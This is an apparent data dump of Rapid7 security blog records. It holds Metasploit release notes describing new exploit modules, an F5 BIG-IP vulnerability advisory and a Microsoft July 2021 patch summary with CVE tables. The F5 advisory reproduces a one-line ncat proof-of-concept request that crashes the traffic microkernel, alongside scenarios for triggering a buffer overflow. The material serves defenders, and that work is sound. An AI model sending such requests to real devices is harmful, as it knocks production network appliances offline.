\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-10T19:39:42", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1240", "CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2022-3699", "CVE-2022-47966", "CVE-2023-0669"], "modified": "2023-02-10T19:39:42", "id": "RAPID7BLOG:3E54ECACB70B1C9E4DF1458D3CABE899", "href": "https://blog.rapid7.com/2023/02/10/metasploit-weekly-wrap-up-192/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-04-30T18:51:30", "description": "## Operations shell\n\n\n\nOperations and management software make popular targets due to their users typically having elevated privileges across a network. 
Our own [wvu](<https://github.com/wvu-r7>) contributed the [VMware vRealize Operations (vROps) Manager SSRF RCE](<https://github.com/rapid7/metasploit-framework/pull/15005>) exploit module for the vulnerabilities discovered by security researcher Egor Dimitrenko. The `exploit/linux/http/vmware_vrops_mgr_ssrf_rce` module achieves remote code execution (RCE) as the `admin` Unix user by chaining the two vulnerabilities. First, the [CVE-2021-21975](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975?referrer=blog#rapid7-analysis>) pre-authentication server-side request forgery (SSRF) vulnerability is exploited in the `/casa/nodes/thumbprints` endpoint to obtain the admin credentials. Then, the credentials are used to authenticate to the vRealize Operations Manager API and exploit [CVE-2021-21983](<https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983?referrer=blog>) via the `/casa/private/config/slice/ha/certificate` endpoint. This allows the module to write and execute an arbitrary file, a JSP payload in this case. The module should work against the following vulnerable versions:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n\n## Data rules everything around me\n\nMany dynamic websites and business applications have associated databases, so databases are commonplace on networks. Odds are you frequently encounter more than one database on an engagement. The release this week includes two new database-related modules!\n\nThe first is an [Apache Druid RCE](<https://github.com/rapid7/metasploit-framework/pull/14977>) exploit module for a vulnerability in versions 0.20.0 and older. The vulnerability [CVE-2021-25646](<https://attackerkb.com/topics/lOVKwIVWHg/cve-2021-25646?referrer=blog>) was discovered by Litch1, and [je5442804](<https://github.com/je5442804>) contributed the module. 
The second, a gather module named [Redis Extractor](<https://github.com/rapid7/metasploit-framework/pull/14702>) contributed by [Geoff Rainville (noncenz)](<https://github.com/noncenz>), enables easy looting of any key-value stores you discover.\n\n## New Module Content (5)\n\n * [Redis Extractor](<https://github.com/rapid7/metasploit-framework/pull/14702>) by Geoff Rainville noncenz - Adds a module to retrieve all data from a Redis instance (version 2.8.0 and above).\n * [Apache Druid 0.20.0 Remote Command Execution](<https://github.com/rapid7/metasploit-framework/pull/14977>) by Litch1, Security Team of Alibaba Cloud and je5442804, which exploits [CVE-2021-25646](<https://attackerkb.com/topics/lOVKwIVWHg/cve-2021-25646?referrer=blog>) \\- This adds an exploit module that targets Apache Druid versions prior to `0.20.1`. An authenticated user can send a single request that both enables the execution of user-provided JavaScript code and executes the code on the server with the privileges of the user running the Apache Druid process. 
By default, Apache Druid does not require authentication.\n * [VMware vRealize Operations (vROps) Manager SSRF RCE](<https://github.com/rapid7/metasploit-framework/pull/15005>) by wvu and Egor Dimitrenko, which exploits [CVE-2021-21983](<https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983?referrer=blog>) \\- This adds a module that exploits both a pre-auth SSRF and a post-auth file write via directory traversal to get code execution as the `admin` user on vulnerable VMware vRealize Operations Manager installs.\n * [Micro Focus Operations Bridge Reporter shrboadmin default password](<https://github.com/rapid7/metasploit-framework/pull/15086>) by Pedro Ribeiro, which exploits ZDI-20-1215 - This adds an exploit for [CVE-2020-11857](<https://attackerkb.com/topics/0rBqrv2UNX/cve-2020-11857?referrer=blog>) which is a hardcoded SSH password in Micro Focus Operations Bridge Manager instances.\n * [KOFFEE - Kia OFFensivE Exploit](<https://github.com/rapid7/metasploit-framework/pull/15021>) by Gianpiero Costantino and Ilaria Matteucci, which exploits [CVE-2020-8539](<https://attackerkb.com/topics/zXxJ29z090/cve-2020-8539?referrer=blog>) \\- This adds a post module that leverages the CVE-2020-8539 vulnerability on certain Kia Motors head units. 
This vulnerability is also known as KOFFEE.\n\n## Enhancements and features\n\n * [#11257](<https://github.com/rapid7/metasploit-framework/pull/11257>) from [sempervictus](<https://github.com/sempervictus>) \\- This PR adds the ability to wrap some powershell used for exploitation purposes with RC4 for obfuscation.\n * [#15014](<https://github.com/rapid7/metasploit-framework/pull/15014>) from [ctravis-r7](<https://github.com/ctravis-r7>) \\- Adds the ability to specify an individual private key as a string parameter into the `auxiliary/scanner/ssh/ssh_login_pubkey` module.\n * [#15110](<https://github.com/rapid7/metasploit-framework/pull/15110>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds the necessary functionality to the Java Meterpreter to resolve hostnames over DNS, closing a feature gap that had been present with other Meterpreters.\n\n## Bugs Fixed\n\n * [#14953](<https://github.com/rapid7/metasploit-framework/pull/14953>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- Fix the python 3.6 string formatting syntax in modules/auxiliary/scanner/http/rdp_web_login\n * [#15050](<https://github.com/rapid7/metasploit-framework/pull/15050>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) \\- Fixes a crash in Metasploit's console when the user tried to tab complete values such as file paths that were missing their final ending quote\n * [#15081](<https://github.com/rapid7/metasploit-framework/pull/15081>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) \\- Updates the Microsoft SQL Server interesting data finder module to correctly handle the scenario where no interesting data is found. 
Previously this would result in a module crash.\n * [#15094](<https://github.com/rapid7/metasploit-framework/pull/15094>) from [timwr](<https://github.com/timwr>) \\- This fixes a bug in how certain Meterpreters would execute commands issued through `sessions -c`, where some would use a subshell while others would not.\n * [#15114](<https://github.com/rapid7/metasploit-framework/pull/15114>) from [smashery](<https://github.com/smashery>) \\- Updates the `auxiliary/scanner/redis/file_upload` module to correctly handle Redis instances that require authenticated access.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.41...6.0.42](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-04-22T13%3A32%3A25%2B10%3A00..2021-04-29T10%3A54%3A48-05%3A00%22>)\n * [Full diff 6.0.41...6.0.42](<https://github.com/rapid7/metasploit-framework/compare/6.0.41...6.0.42>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-04-30T17:42:19", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11857", "CVE-2020-8539", "CVE-2021-21975", "CVE-2021-21983", "CVE-2021-25646"], "modified": "2021-04-30T17:42:19", "id": "RAPID7BLOG:B7FE1EAED2C3AB6161A7ADCBD8A34ADF", "href": "https://blog.rapid7.com/2021/04/30/metasploit-wrap-up-109/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-03-25T16:50:12", "description": "\n\n**Update March 25, 2021:** CVE-2021-22986 is now being actively exploited in the wild by a range of malicious actors. Rapid7 has in-depth technical analysis on this vulnerability, including proof-of-concept code and information on indicators of compromise, available [here](<https://attackerkb.com/assessments/f6b19d24-b24e-4abd-98cf-2988d7424311>).\n\nOn March 10, 2021, F5 disclosed eight vulnerabilities, four of which are deemed "critical", the most severe of which is CVE-2021-22986, an **unauthenticated remote code execution** weakness that enables remote attackers to execute arbitrary commands on compromised BIG-IP devices:\n\n * [K03009991: iControl REST unauthenticated remote command execution vulnerability CVE-2021-22986](<https://support.f5.com/csp/article/K03009991>) (actively exploited in the wild)\n * [K18132488: Appliance mode TMUI authenticated remote command execution vulnerability CVE-2021-22987](<https://support.f5.com/csp/article/K18132488>)\n * [K70031188: TMUI authenticated remote command execution vulnerability CVE-2021-22988](<https://support.f5.com/csp/article/K70031188>)\n * [K56142644: Appliance mode Advanced WAF/ASM TMUI authenticated 
remote command execution vulnerability CVE-2021-22989](<https://support.f5.com/csp/article/K56142644>)\n * [K45056101: Advanced WAF/ASM TMUI authenticated remote command execution vulnerability CVE-2021-22990](<https://support.f5.com/csp/article/K45056101>)\n * [K56715231: TMM buffer-overflow vulnerability CVE-2021-22991](<https://support.f5.com/csp/article/K56715231>)\n * [K52510511: Advanced WAF/ASM buffer-overflow vulnerability CVE-2021-22992](<https://support.f5.com/csp/article/K52510511>)\n * [K66851119: F5 TMUI XSS vulnerability CVE-2021-22994](<https://support.f5.com/csp/article/K66851119>)\n\nOn March 18, 2021, NCC Group [reported seeing in the wild exploitation attempts](<https://twitter.com/NCCGroupInfosec/status/1372614697158053888?s=20>) and they, along with other sources, expect that final development of a complete attack chain is imminent.\n\nGiven that a complete exploit chain will be available soon, we recommend patching F5 systems that expose the affected planes (see below) within the next 3\u20135 days and F5 systems that only expose affected planes internally within a 30-day patch window that hopefully started eight days ago, provided that your organization follows a typical 30-, 60-, 90-day prioritization scheme. If your organization does not have a defined patch cadence system, Rapid7 still recommends that you consider applying these internal system patches within the next 20 days.\n\n## Critical vulnerability overview\n\n### [CVE-2021-22986](<https://support.f5.com/csp/article/K03009991>)\n\n_iControl REST unauthenticated remote command execution vulnerability (CVSSv3 9.8)._\n\nAn HTTP REST API endpoint exposed on the **control plane** of F5 devices has an unauthenticated remote code execution vulnerability, enabling attackers to execute arbitrary code/commands on compromised devices. 
This impacts BIG-IP systems 7.0.0, 7.1.0, 12.x, and later, as well as any BIG-IQ (F5 BIG-IP centralized management service) version regardless of configuration.\n\n### [CVE-2021-22991](<https://support.f5.com/csp/article/K90004114>)\n\n_Traffic Management Microkernel (TMM) buffer-overflow vulnerability (CVSSv3 9.0)._\n\nThe Traffic Management Microkernel (TMM), which handles requests to virtual servers on the **data plane**, improperly handles certain undisclosed uniform resource identifiers (URIs). Malicious HTTP requests may cause a buffer overflow and result in a denial-of-service attack. You are vulnerable to exploits if any of the following configurations apply to your F5 deployments:\n\n * BIG-IP 12.1.x or later running BIG-IP Access Policy Manager (APM) in any configuration\n * Specific functions are defined in enabled iRules or LTM policies\n * The URL categorization feature is enabled and in use in either BIG-IP PEM or Secure Web Gateway\n\nFurthermore, customers in the F5 "early access" program are also vulnerable if they are using the Advanced WAF Risk Engine.\n\nThe following commands can be run from a TMOS Shell (tmsh) and will return iRules / LTM policies that can be reviewed against [example policies provided by F5](<https://support.f5.com/csp/article/K56715231>) to determine whether your configurations are at risk:\n \n \n tmsh -q -c \"cd / ; list /ltm rule recursive\" | egrep 'ltm rule|normalize' | grep -B1 normalize # iRules recursive query\n tmsh -q -c \"cd / ; list /ltm policy recursive\" | egrep 'ltm policy|normalize' | grep -B1 normalize # LTM policies recursive query\n \n\n### [CVE-2021-22987](<https://support.f5.com/csp/article/K18132488>)\n\n_Appliance Mode TMUI **authenticated** remote command execution vulnerability (CVSSv3 9.9)._\n\nIf an F5 device is running in [appliance mode](<https://support.f5.com/csp/article/K12815>), the Traffic Management User Interface (TMUI)/Configuration utility on the **control plane** has an 
authenticated remote code execution vulnerability in an unknown number of target URL paths, enabling attackers to execute arbitrary code/commands on compromised devices.\n\n### [CVE-2021-22992](<https://support.f5.com/csp/article/K52510511>)\n\n_Advanced WAF/ASM buffer-overflow vulnerability (CVSSv3 9.0)._\n\nIf an F5 Advanced WAF/BIG-IP ASM virtual server has a [Login Page](<https://techdocs.f5.com/en-us/bigip-14-1-0/big-ip-asm-implementations-14-1-0/creating-login-pages-for-secure-application-access.html>) policy defined, malicious HTTP **responses** may cause a buffer overflow, resulting in a denial-of-service attack and possibly remote code execution. This vulnerability is exposed on the **data plane**.\n\n**NOTE:** The **data plane** refers to any traffic handled by a virtual server, SNAT, NAT, or other non-control-plane-traffic handler. The **control plane** refers to management-related services and traffic flowing to them, such as the Configuration utility (TMUI), iControl REST, and SSH, either through the management IP address or a self IP address exposing the HTTPS or SSH ports (usually 443 or 22).\n\n## Selected expanded details\n\nA [Project Zero](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2132>) report on CVE-2021-22992 posted by [Felix Wilhelm](<https://twitter.com/_fel1x/status/1369675356073041924?s=20>) notes that the vulnerable condition is triggered when BIG-IP systems have rules in place that process HTTP response headers (login pages are given as an example). The web application firewall does not process overlong HTTP response headers properly, and this can lead to a stack-based overflow.\n\n_This is not a trivial weakness to set up_, and in many cases requires knowledge or control of back-end applications behind F5 systems. The researcher notes three scenarios where attackers may be able to gain more granular control over HTTP response headers:\n\n 1. 
**HTTP header injection**: If one of the backend applications that sits behind an F5 system does not properly handle carriage returns/line feeds (CR/LF) in some inbound HTTP headers that are returned in the HTTP response, an attacker can use this weakness in that application (_not the F5 system itself_) to cause the overflow situation in the F5 system.\n 2. **Request smuggling + HTTP/0.9**: Some F5 configurations may still be vulnerable to various [request smuggling](<https://en.wikipedia.org/wiki/HTTP_request_smuggling>) techniques. Attackers may use an old version of the HTTP protocol (HTTP/0.9) to issue a simplified request to F5-fronted applications. These HTTP/0.9 requests will only return an HTML response without response headers. It may be possible to craft such a request to return user-controllable HTML responses that will trigger this stack-based overflow.\n 3. **Compromised backend**: If an attacker has control over one or more F5-fronted applications, they may be able to use those systems to craft sufficiently large responses to trigger the overflow condition.\n\nThe same researcher also posted a [Project Zero report](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2126>) on CVE-2021-22991 noting a weakness in how IPv6 hostnames are processed. An example configuration and demonstration are provided there and reproduced below.\n\nIf there is an F5 iRule such as:\n \n \n when HTTP_REQUEST { \n log local0. \"normalized: [HTTP::uri -normalized]\" \n log local0. 
\"uri: [HTTP::uri]\"\n }\n \n\na malicious request of the form:\n \n \n echo -e \"GET h://[f] HTTP/1.1\\r\\n\\r\\n\" | ncat --ssl 10.154.0.3 443\n \n\nwill result in uninitialized memory being written to `/var/log/ltm` on the F5 host, which can lead to a direct crash of the Traffic Management Microkernel and, thus, a denial of service.\n\nExploitation is dependent on certain iRule configurations being in place, but attackers have plenty of time on their hands and an abundance of compromised hosts available to try many combinations of requests, and F5 systems are easily discoverable on the internet.\n\n## Available mitigations\n\nUntil it is possible to install fixed versions, organizations can use the following F5 references as temporary mitigations for CVE-2021-22986 and CVE-2021-22987 to restrict access to iControl REST API endpoints:\n\n * [Block iControl REST access through the self IP address](<https://support.f5.com/csp/article/K03009991#proc1>)\n * [Block iControl REST access through the management interface](<https://support.f5.com/csp/article/K03009991#proc2>)\n\n## InsightVM Coverage\n\nWe currently have coverage for the following CVEs:\n\n * CVE-2021-22986\n * CVE-2021-22987\n * CVE-2021-22988\n * CVE-2021-22991\n * CVE-2021-22994\n\nWe are investigating coverage for the remaining three CVEs affecting F5 Advanced WAF/BIG-IP ASM:\n\n * CVE-2021-22989\n * CVE-2021-22990\n * CVE-2021-22992\n", "cvss3": {}, "published": "2021-03-18T20:19:22", "type": "rapid7blog", "title": "F5 Discloses Eight Vulnerabilities\u2014Including Four Critical Ones\u2014in BIG-IP Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22986", "CVE-2021-22987", "CVE-2021-22988", "CVE-2021-22989", "CVE-2021-22990", "CVE-2021-22991", "CVE-2021-22992", "CVE-2021-22994"], "modified": "2021-03-18T20:19:22", "id": "RAPID7BLOG:72759E1136A76135F26DD97485912606", "href": 
"https://blog.rapid7.com/2021/03/18/f5-discloses-eight-vulnerabilities-including-four-critical-ones-in-big-ip-systems/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-28T14:56:11", "description": "\n\n[Microsoft has patched another 117 CVEs](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jul>), returning to volumes seen in early 2021 and most of 2020. It would appear that the recent trend of approximately 50 vulnerability fixes per month was not indicative of a slowing pace. This month there were 13 vulnerabilities rated Critical, with nearly all of the rest being rated Important. Thankfully, none of the updates published today require additional steps to remediate, so administrators should be able to rely on their normal patching process. Once [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) has been remediated, priority should be to patch public-facing DNS and Exchange servers, followed by workstations, SharePoint servers, and finally Office applications.\n\nIt seems like the PrintNightmare is nearly over. While the past two weeks have been a frenzy for the security community, there has been no new information since the end of last week, when Microsoft made a final revision to their guidance on [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). If you haven\u2019t patched this yet, this is your daily reminder. For further details [please see our blog](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) on the topic.\n\n## Multiple Critical DNS Vulnerabilities Patched\n\nAdministrators should focus their efforts on the 11 vulnerabilities in Windows DNS server to reduce the most risk. 
The two most important of these vulnerabilities are [CVE-2021-34494](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34494>) and [CVE-2021-33780](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33780>). Exploitation of either of these vulnerabilities would result in remote code execution with SYSTEM privileges over the network, without any user interaction. Given the network exposure of DNS servers, these vulnerabilities could prove to be troublesome if an exploit were to be developed. Microsoft lists [CVE-2021-33780](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33780>) as \u201cExploitation More Likely\u201d, so it may only be a matter of time before attackers attempt to make use of these flaws.\n\n## New Exchange Updates Available\n\nOnly 4 of the 7 Exchange CVEs being disclosed this month are new. The two most severe vulnerabilities were patched back in April and were mistakenly not disclosed. This means that if you applied the April 2021 updates you will not need to take any action for [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>), [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>), or [CVE-2021-33766](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33766>). Of the 4 newly patched vulnerabilities, the most notable is [CVE-2021-31206](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206>), a remote code execution flaw discovered in the recent Pwn2Own competition. \n\n## Scripting Engine Exploited in the Wild\n\nExploitation of [CVE-2021-34448](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34448>) has been observed in the wild by researchers. There are no details on the frequency or spread of this exploit. This vulnerability requires the user to visit a link to download a malicious file. 
As with other vulnerabilities that require user interaction, strong security hygiene is the first line of defense.\n\n## Summary Tables\n\nHere are this month's patched vulnerabilities split by the product family.\n\n## Apps Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-33753](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33753>) | Microsoft Bing Search Spoofing Vulnerability | No | No | 4.7 | Yes \n \n## Developer Tools Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34528](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34528>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34529](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34529>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34477](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34477>) | Visual Studio Code .NET Runtime Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33767](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33767>) | Open Enclave SDK Elevation of Privilege Vulnerability | No | No | 8.2 | Yes \n[CVE-2021-34479](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34479>) | Microsoft Visual Studio Spoofing Vulnerability | No | No | 7.8 | No \n \n## Exchange Server Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34473](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34473>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | Yes | 9.1 | No \n[CVE-2021-31206](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31206>) | Microsoft Exchange Server Remote Code Execution 
Vulnerability | No | No | 7.6 | Yes \n[CVE-2021-31196](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31196>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 7.2 | No \n[CVE-2021-34523](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34523>) | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | Yes | 9 | No \n[CVE-2021-33768](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33768>) | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | No | 8 | Yes \n[CVE-2021-34470](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34470>) | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | No | 8 | Yes \n[CVE-2021-33766](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33766>) | Microsoft Exchange Information Disclosure Vulnerability | No | No | 7.3 | Yes \n \n## Microsoft Dynamics Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34474](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34474>) | Dynamics Business Central Remote Code Execution Vulnerability | No | No | 8 | Yes \n \n## Microsoft Office Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34452](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34452>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34517](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34517>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 5.3 | No \n[CVE-2021-34520](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34520>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.1 | No 
\n[CVE-2021-34467](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34467>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 7.1 | No \n[CVE-2021-34468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34468>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 7.1 | Yes \n[CVE-2021-34519](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34519>) | Microsoft SharePoint Server Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-34469](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34469>) | Microsoft Office Security Feature Bypass Vulnerability | No | No | 8.2 | Yes \n[CVE-2021-34451](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34451>) | Microsoft Office Online Server Spoofing Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-34501](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34501>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34518](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34518>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## SQL Server Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-31984](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31984>) | Power BI Remote Code Execution Vulnerability | No | No | 7.6 | Yes \n \n## System Center Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34464>) | Microsoft Defender Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34522](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34522>) | 
Microsoft Defender Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-33772](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33772>) | Windows TCP/IP Driver Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-34490](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34490>) | Windows TCP/IP Driver Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-33744](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33744>) | Windows Secure Kernel Mode Security Feature Bypass Vulnerability | No | No | 5.3 | No \n[CVE-2021-33763](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33763>) | Windows Remote Access Connection Manager Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34454](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34454>) | Windows Remote Access Connection Manager Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-33761](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33761>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33773](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33773>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34445](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34445>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33743](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33743>) | Windows Projected File System Elevation of Privilege Vulnerability | No | No | 7.8 | No 
\n[CVE-2021-34493](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34493>) | Windows Partition Management Driver Elevation of Privilege Vulnerability | No | No | 6.7 | No \n[CVE-2021-33740](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33740>) | Windows Media Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34458](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34458>) | Windows Kernel Remote Code Execution Vulnerability | No | No | 9.9 | Yes \n[CVE-2021-34508](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34508>) | Windows Kernel Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-33771](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33771>) | Windows Kernel Elevation of Privilege Vulnerability | Yes | No | 7.8 | No \n[CVE-2021-31961](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31961>) | Windows InstallService Elevation of Privilege Vulnerability | No | No | 6.1 | Yes \n[CVE-2021-34450](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34450>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 8.5 | Yes \n[CVE-2021-33758](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33758>) | Windows Hyper-V Denial of Service Vulnerability | No | No | 7.7 | No \n[CVE-2021-33755](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33755>) | Windows Hyper-V Denial of Service Vulnerability | No | No | 6.3 | No \n[CVE-2021-34466](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34466>) | Windows Hello Security Feature Bypass Vulnerability | No | No | 5.7 | Yes \n[CVE-2021-34438](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34438>) | Windows Font Driver Host Remote Code Execution Vulnerability | No | No | 7.8 | No 
